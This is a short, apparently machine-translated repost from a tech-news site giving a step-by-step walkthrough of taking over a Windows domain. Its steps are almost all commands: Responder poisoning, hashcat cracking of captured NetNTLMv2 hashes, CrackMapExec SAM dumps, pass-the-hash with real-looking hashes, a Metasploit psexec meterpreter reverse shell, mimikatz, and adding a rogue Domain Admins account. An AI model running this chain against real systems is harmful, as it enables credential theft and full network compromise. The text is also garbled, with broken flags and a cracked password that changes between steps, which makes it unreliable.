Shulou(Shulou.com)06/01 Report--

Summary of domain control permissions obtained by Responder probe private network

(1) execute Responder probe private network (https://github.com/lgandx/Responder)

. / Responder.py-I eth0-rPv

(2) obtain the response value of 172.16.157.133

(3) use Crack Map Exec to check the NetBIOS information of this host

Cme smb 172.16.157.133

(4) use hashcat to crack the response value.

Hashcat-m 5600 responder / usr/share/wordlists/rockyou.txt-r / usr/share/rules/d3adhob0.rule

Get the password value Winter2018!

(5) CME scanning

Cme smb 172.16.157.133-u FRONTDESK-p 'Winter2018winter'- local-auth

(6) obtain a local administrator account to dump the local password hash

Cme smb 172.16.157.133-u FRONTDESK-p 'Winter2018bread'--local-auth-- sam

(7) obtain the NTLM hash value of the FRONTDESK password

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

(8) Hash delivery method to check the smb permissions of the local network

Cme smb 172.16.157.0 cme smb 24-u administrator-H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51'-- local-

Auth

(9) you can log in to 172.16.157.134 server

(10) View 172.16.157.134. The computer has domain control permissions.

Cme smb 172.16.157.134

(11) shell acquisition using smb password under msf

Use exploit/windows/smb/psexec

Set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

Set smbuser administrator

Set playload windows/x64/meterpreter/reverse_tcp

Run

Getuid

(12) use mimikatz to obtain domain control password

Load mimikatz

Kerberos

Cme smb 172.16.157.135-u administrator-p 'October17'-x' net user markitzeroda hackersPassword! / add / domain / y & & net group "domain admins" markitzeroda

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.